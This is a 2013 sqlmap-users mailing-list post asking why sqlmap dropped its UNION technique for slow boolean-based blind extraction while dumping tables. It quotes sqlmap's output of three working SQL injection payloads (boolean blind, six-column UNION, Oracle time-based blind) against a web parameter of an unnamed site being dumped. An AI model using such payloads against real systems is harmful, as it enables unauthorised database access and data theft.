[sqlmap-users] UNION and then Blind AND ???
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] UNION and then Blind AND ???
|
From: Carlos S. <r3...@r3...> - 2013-07-28 03:52:01
|
Hi!
I found an odd behavior on sqlmap. I throwed it and url where it found this:
Place: GET
Parameter: pub
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: XXX=' OR '1'='1' UNION ALL SELECT
NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL
FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS
T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD
So, the best way to dump the DB would be to use the UNION query since it
can retrieve the whole table at a time.
Now, the funny thing is that it actually used this for the first 4 or 5
tables, which are 5 or 6 columns wide, but then, on a table with only 3
columns it didn't. It is now using a slow-moving AND boolean-based attack
to dump the table char-by-char but I can't understand why. Any known reason
for this? Or I'm just missing something?
|
